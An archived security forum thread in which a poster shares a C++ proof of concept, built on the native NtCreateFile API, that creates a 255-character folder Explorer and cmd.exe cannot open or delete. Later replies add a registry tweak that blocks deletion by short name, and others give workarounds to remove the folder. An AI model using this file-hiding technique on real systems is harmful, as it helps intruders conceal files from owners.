Forums: Long Folder Names In Windows - Forums

Long Folder Names In Windows Explorer + CMD.exe cannot access

#1 User is offline   tibbar 

  • Master Sergeant
  • Group: Members
  • Posts: 1,423
  • Joined: 14-October 03

Posted 02 July 2005 - 01:38 AM

Here's a little flaw in Windows I recently discovered. Any folder name that is 255 characters long cannot be opened by cmd.exe or explorer.exe, despite the name being valid within NTFS.

You can use the native API (Ntxxx) to create such a folder. Below is a POC which creates a folder named "___________________________" x 255 and creates an empty file inside the folder.

Neither cmd.exe nor explorer.exe can access the folder or delete it! Potentially unwelcome guests could use this flaw to hide their files.

Here's the code, and a compiled version is posted in downloads since compiling requires the DDK.

#define UNICODE
#include "windows.h"
#include <cctype>
#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <iostream>
#include <string>

#pragma comment(lib,"C:\\WINDDK\\DDK_WI~1\\lib\\wxp\\i386\\ntdll.lib")
#pragma comment(lib,"C:\\WINDDK\\DDK_WI~1\\lib\\wxp\\i386\\ntoskrnl.lib")

// Local transcriptions of the native (ntdll) API types, so the program builds
// against windows.h alone. The layouts must match what ntdll.dll expects, so
// they are deliberately left exactly as in the DDK headers (including the
// MIDL_PASS branch, which only matters when an IDL compiler reads this file).
typedef LONG NTSTATUS;   // >= 0 is success, < 0 is failure
// Counted wide string. The MIDL annotation below (MaximumLength / 2,
// Length / 2) shows that both lengths are byte counts, not character counts.
typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
#ifdef MIDL_PASS
    [size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT * Buffer;
#else // MIDL_PASS
    PWSTR  Buffer;
#endif // MIDL_PASS
} UNICODE_STRING;
typedef UNICODE_STRING *PUNICODE_STRING;

// Name/flags bundle passed to NtCreateFile; filled in by the
// InitializeObjectAttributes macro further down (Length = sizeof this struct).
typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;        // Points to type SECURITY_DESCRIPTOR
    PVOID SecurityQualityOfService;  // Points to type SECURITY_QUALITY_OF_SERVICE
} OBJECT_ATTRIBUTES;
typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES;

// Completion record written by NtCreateFile; this program never reads it.
typedef struct _IO_STATUS_BLOCK {
    union {
        NTSTATUS Status;
        PVOID Pointer;
    };

    ULONG_PTR Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

// ntdll exports, declared by hand and resolved from the ntdll.lib named in the
// #pragma comment(lib) lines above. NtCreateFile is the native call under
// CreateFile; here it is given a "\DosDevices\..." object path directly, which
// is what lets the directory name bypass the Win32 path layer.
extern "C" NTSTATUS __stdcall 
NtCreateFile(
    OUT PHANDLE FileHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN PLARGE_INTEGER AllocationSize OPTIONAL,
    IN ULONG FileAttributes,
    IN ULONG ShareAccess,
    IN ULONG CreateDisposition,
    IN ULONG CreateOptions,
    IN PVOID EaBuffer OPTIONAL,
    IN ULONG EaLength
    );

// Points DestinationString at SourceString and sets its lengths; per its
// documentation it does not copy the text, so SourceString must outlive the
// UNICODE_STRING.
extern "C" void __stdcall
  RtlInitUnicodeString(
    IN OUT PUNICODE_STRING  DestinationString,
    IN PCWSTR  SourceString
    );
// Declared but never called in this file (RtlInitUnicodeString allocates
// nothing, so there is nothing to free).
extern "C" void __stdcall
RtlFreeUnicodeString(
    IN PUNICODE_STRING  UnicodeString
    );

// Native CloseHandle; used on both handles returned by NtCreateFile.
extern "C" NTSTATUS __stdcall
  NtClose(
    IN HANDLE  Handle
    );

// Mirrors the DDK's InitializeObjectAttributes: fills an OBJECT_ATTRIBUTES in
// place (p = struct pointer, n = PUNICODE_STRING name, a = OBJ_* flags,
// r = root directory handle, s = security descriptor). The quality-of-service
// pointer is always NULL. No comments inside the macro: a trailing `\` after
// a // comment would splice the next line into the comment.
#define InitializeObjectAttributes( p, n, a, r, s ) { \
    (p)->Length = sizeof( OBJECT_ATTRIBUTES );          \
    (p)->RootDirectory = r;                             \
    (p)->Attributes = a;                                \
    (p)->ObjectName = n;                                \
    (p)->SecurityDescriptor = s;                        \
    (p)->SecurityQualityOfService = NULL;               \
    }

// Constants copied from the DDK headers; only the subset this program uses.
// The NtCreateFile calls in main() pass FILE_CREATE / FILE_SUPERSEDE as
// CreateDisposition and FILE_DIRECTORY_FILE / FILE_NON_DIRECTORY_FILE as
// CreateOptions.
#define OBJ_CASE_INSENSITIVE    0x00000040L   // ObjectName lookup ignores case
#define FILE_NON_DIRECTORY_FILE                 0x00000040   // CreateOptions: object must not be a directory
#define FILE_ATTRIBUTE_VALID_FLAGS          0x00007fb7   // defined but unused in this file
#define OBJ_KERNEL_HANDLE       0x00000200L   // NOTE(review): kernel-mode flag; from a user-mode caller it is presumably ignored by the object manager - confirm
#define FILE_SUPERSEDE                  0x00000000   // CreateDisposition: replace the file if it already exists
#define FILE_DIRECTORY_FILE                     0x00000001   // CreateOptions: object is a directory
#define FILE_CREATE                     0x00000002   // CreateDisposition: fail if the object already exists

// Thin wrapper that forwards to RtlInitUnicodeString: *pString is pointed at
// pText (per its documentation no copy is made, so pText must outlive
// *pString). Not called by main() below, which invokes RtlInitUnicodeString
// directly.
void CreateUnicode(PUNICODE_STRING pString, wchar_t* pText)
{
	RtlInitUnicodeString(pString, pText);
}

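// Converts a narrow (current code page) string to a wide string with mbstowcs.
// Returns an empty string if the conversion fails.
static std::wstring ToWide(const std::string& narrow)
{
	// +1 so the terminator is converted as well.
	std::wstring wide(narrow.size() + 1, L'\0');
	const size_t converted = mbstowcs(&wide[0], narrow.c_str(), wide.size());
	if (converted == static_cast<size_t>(-1))
	{
		return std::wstring();
	}
	wide.resize(converted);
	return wide;
}

// Usage: createLongFile.exe create <filename>
//
// Creates, in the current directory, a directory whose name is
// kLongNameLength underscores and an empty file <filename> inside it, by
// calling NtCreateFile with a "\DosDevices\<cwd>\..." NT object path instead
// of a Win32 path. Returns 0 on success and 1 on a usage or API failure.
//
// Differences from the original listing:
//   - the command word is read from argv[1]; the original tested argv[0] (the
//     program name) and never compared the strcmp result with 0, so the check
//     was a no-op and the code ran whenever argc == 3;
//   - the wide-string buffers are std::wstring instead of new[]'d arrays
//     released with `delete wideStringDir, wideStringFile;`, which (comma
//     operator) freed only the first one, and with delete rather than delete[];
//   - both NTSTATUS results are checked before NtClose is called on a handle
//     that may never have been written.
//
// As the thread below points out, the directory is still listed by Explorer
// and can be removed from the command line through its 8.3 short name (or
// with Services for Unix), so it hides nothing from a tool that walks the
// native API.
int main(int argc, char* argv[])
{
	// Length of the directory name. The post describes a 255-character name;
	// the forum wrapped the original literal, so the exact count is taken from
	// the description rather than the listing.
	const size_t kLongNameLength = 255;

	if (argc == 3 && strcmp(argv[1], "create") == 0)
	{
		// Current directory: the first call only reports the required size
		// (including the terminator); the second fills the buffer.
		char probe = 0;
		const DWORD requiredLength = GetCurrentDirectoryA(1, &probe);
		if (requiredLength == 0)
		{
			printf("GetCurrentDirectory failed (error %lu)\n", GetLastError());
			return 1;
		}
		std::string currentDir(requiredLength, '\0');
		const DWORD written = GetCurrentDirectoryA(requiredLength, &currentDir[0]);
		if (written == 0 || written >= requiredLength)
		{
			printf("GetCurrentDirectory failed (error %lu)\n", GetLastError());
			return 1;
		}
		currentDir.resize(written);

		// The original upper-cased the path with strupr(); kept for parity,
		// although OBJ_CASE_INSENSITIVE below makes the case irrelevant.
		for (char& c : currentDir)
		{
			c = static_cast<char>(toupper(static_cast<unsigned char>(c)));
		}

		// NT object paths: \DosDevices\<cwd>\<underscores>\ and the file in it.
		const std::string dirPath =
			"\\DosDevices\\" + currentDir + "\\" + std::string(kLongNameLength, '_') + "\\";
		const std::string filePath = dirPath + argv[2];

		const std::wstring wideDir = ToWide(dirPath);
		const std::wstring wideFile = ToWide(filePath);
		if (wideDir.empty() || wideFile.empty())
		{
			printf("mbstowcs failed to convert the path\n");
			return 1;
		}

		// RtlInitUnicodeString references the wstring buffers rather than
		// copying them; both strings stay alive until the end of this scope,
		// i.e. past the NtCreateFile calls.
		UNICODE_STRING dirUniStr;
		RtlInitUnicodeString(&dirUniStr, wideDir.c_str());
		UNICODE_STRING fileUniStr;
		RtlInitUnicodeString(&fileUniStr, wideFile.c_str());

		OBJECT_ATTRIBUTES dirAttributes;
		InitializeObjectAttributes(&dirAttributes,
			&dirUniStr,
			OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,
			NULL,
			NULL);

		OBJECT_ATTRIBUTES fileAttributes;
		InitializeObjectAttributes(&fileAttributes,
			&fileUniStr,
			OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,
			NULL,
			NULL);

		// Access, share mode, disposition and options are kept as in the
		// original: FILE_CREATE + FILE_DIRECTORY_FILE for the directory,
		// FILE_SUPERSEDE + FILE_NON_DIRECTORY_FILE for the file.
		// NTSTATUS >= 0 means success.
		IO_STATUS_BLOCK dirStatusBlock;
		HANDLE hDir = NULL;
		const NTSTATUS dirStatus = NtCreateFile(&hDir,
			DELETE,
			&dirAttributes,
			&dirStatusBlock,
			NULL,
			FILE_ATTRIBUTE_NORMAL,
			FILE_SHARE_READ,
			FILE_CREATE,
			FILE_DIRECTORY_FILE,
			NULL,
			0);
		if (dirStatus < 0)
		{
			printf("NtCreateFile (directory) failed: 0x%08lX\n",
				static_cast<unsigned long>(dirStatus));
			return 1;
		}

		IO_STATUS_BLOCK fileStatusBlock;
		HANDLE hFile = NULL;
		const NTSTATUS fileStatus = NtCreateFile(&hFile,
			DELETE,
			&fileAttributes,
			&fileStatusBlock,
			NULL,
			FILE_ATTRIBUTE_NORMAL,
			FILE_SHARE_READ,
			FILE_SUPERSEDE,
			FILE_NON_DIRECTORY_FILE,
			NULL,
			0);
		if (fileStatus < 0)
		{
			printf("NtCreateFile (file) failed: 0x%08lX\n",
				static_cast<unsigned long>(fileStatus));
			NtClose(hDir);
			return 1;
		}

		NtClose(hFile);
		NtClose(hDir);

		printf("long file created...");
	}
	else
	{
		printf("Usage createLongFile.exe create filename\n");
		printf("This will create a long directory named ___... in current folder\n");
		printf("With a file inside it called \"filename\"\n");
		printf("This folder will be inaccessible from both explorer and cmd.exe\n");
		printf("POC by tibbar@governmentsecurity.org");
	}

	return 0;
}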

If you want to read more about my security research, visit Tibbar.org

#2 User is offline   nolimit 

  • Sergeant First Class
  • Group: Members
  • Posts: 387
  • Joined: 27-January 04

Posted 02 July 2005 - 04:57 AM

thanx!
oh, how do you compile?

#3 User is offline   tibbar 

  • Master Sergeant
  • Group: Members
  • Posts: 1,423
  • Joined: 14-October 03

Posted 02 July 2005 - 04:59 AM

under visual studio it should compile. you need to first get hold of ntdll.lib and ntoskrnl.lib from the ddk.
If you want to read more about my security research, visit Tibbar.org

#4 User is offline   belgther 

  • Master Sergeant
  • Group: Specialist
  • Posts: 650
  • Joined: 06-October 04

Posted 02 July 2005 - 05:26 AM

Quote

Neither cmd.exe nor explorer.exe can access the folder or delete it! Potentially unwelcome guests could use this flaw to hide their files.


Then how will the unwelcome guests reach the files? Via a shell? Because the APIs used in explorer.exe and cmd.exe can't get at it...
"The wisest one is the one who knows himself/herself." Quote of the life
belgther... aka... belgther

#5 User is offline   stay 

  • Master Sergeant
  • Group: Members
  • Posts: 493
  • Joined: 19-June 05

Posted 02 July 2005 - 06:11 AM

it's possible to access the folders with cmd.exe using a really simple trick...
however, the fact that the dirs are still listed in explorer makes this bug somewhat useless: you could write a tool that checks for those dirs and then access them with cmd.exe, so in the end they offer no real "protection" — you won't be able to store files in them that are unreachable or hard to find.

#6 User is offline   tibbar 

  • Master Sergeant
  • Group: Members
  • Posts: 1,423
  • Joined: 14-October 03

Posted 03 July 2005 - 04:44 PM

well, the trick to deleting them that stay found was to use the short file name for the folder.

however, adding the following reg value eliminates that possibility:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem]
"NtfsDisable8dot3NameCreation"=dword:00000001


Also when the long name folder is placed not at the root (i.e. not at c:\ but at say c:\windows) then all normal context menu options are lost and the folder cannot be accessed or deleted or renamed.

It would be fairly easy to mod an FTP server to access these special folders, using native NtXXX functions.
If you want to read more about my security research, visit Tibbar.org

#7 User is offline   Killaloop 

  • Master Sergeant
  • Group: Members
  • Posts: 677
  • Joined: 01-January 04

Posted 03 July 2005 - 11:09 PM

http://support.micro...kb;en-us;205345
There Microsoft says it has been fixed; guess they lost this fix after a few more patches.
as usual.

#8 User is offline   stay 

  • Master Sergeant
  • Group: Members
  • Posts: 493
  • Joined: 19-June 05

Posted 04 July 2005 - 04:39 AM

hmm microsoft seems to have a very bad organisation ;)

addition to tibbar's solution post:
when 8.3 is disabled, you can still access the folders by using
/[full dir name]
as the path, except when the path consists only of spaces (at least I found no way to get around this by using "..." — maybe someone knows a workaround for this, or another method besides this one and the 8.3 one mentioned above?)

#9 User is offline   kingvandal 

  • Master Sergeant
  • Group: Second Lieutenant
  • Posts: 719
  • Joined: 27-January 04

Posted 04 July 2005 - 05:30 PM

Quote

Also when the long name folder is placed not at the root (i.e. not at c:\ but at say c:\windows) then all normal context menu options are lost and the folder cannot be accessed or deleted or renamed.


you ain't kiddin. I created it on the desktop and now the folder is stuck there..lol I tried everything I could to get rid of it. Guess it's there to stay til I get a PBE cd going.


kv-
Tchirimbimbim!!!
Very Interesting: Windows XP Source Code! and Windows Vista Source Code!!. Read'em and weap...

#10 User is offline   tibbar 

  • Master Sergeant
  • Group: Members
  • Posts: 1,423
  • Joined: 14-October 03

Posted 04 July 2005 - 08:47 PM

services for unix can see it and delete it.
If you want to read more about my security research, visit Tibbar.org

#11 User is offline   stay 

  • Master Sergeant
  • Group: Members
  • Posts: 493
  • Joined: 19-June 05

Posted 05 July 2005 - 02:29 AM

kingvandal, on Jul 5 2005, 12:30 AM, said:

you ain't kindin.  I created it on the dektop and now the folder is stuck there..lol  I tryed everything I could  to get rid of it.  Guess it's there to stay til I get a PBE cd going. 


kv-


use the commandline together with 8.3 names to get rid of it!
